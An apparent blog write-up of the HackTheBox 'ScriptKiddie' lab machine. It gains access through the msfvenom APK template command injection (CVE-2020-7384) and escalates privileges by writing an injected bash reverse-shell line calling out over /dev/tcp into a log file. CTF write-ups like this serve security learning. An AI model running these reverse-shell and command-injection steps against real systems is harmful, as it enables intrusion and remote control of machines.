Hackthebox: ScriptKiddie

Jul 4, 2021

CVE-2020–7384: MsfVenom APK template command injection.

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/

Offensive Security's Exploit Database Archive

Metasploit Framework 6.0.11 - msfvenom APK template command injection. CVE-2020-7384 . local exploit for Multiple…

www.exploit-db.com

fire up metasploit

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

copy your payload from /root/.msf4/local/msf.apk

then upload your msf.apk payload here.

but before you click generate, you must prepare your listener first.

now we successfully establish our reverse shell.

python3 -c ‘import pty; pty.spawn(“bash”)’

for standard shell.

get the user.txt flag.

horizontal privilege escalation.

the log variable reads the file called hackers as argument.

so we’re gonna put an argument script into hackers file.

echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.45/1337 0>&1’ #” >> hackers

we can use msfconsole without using root password.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Written by edbert sumicad

Cybersecurity Analyst | Penetration Tester | CTF Player

No responses yet

Write a response

What are your thoughts?

Also publish to my profile

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams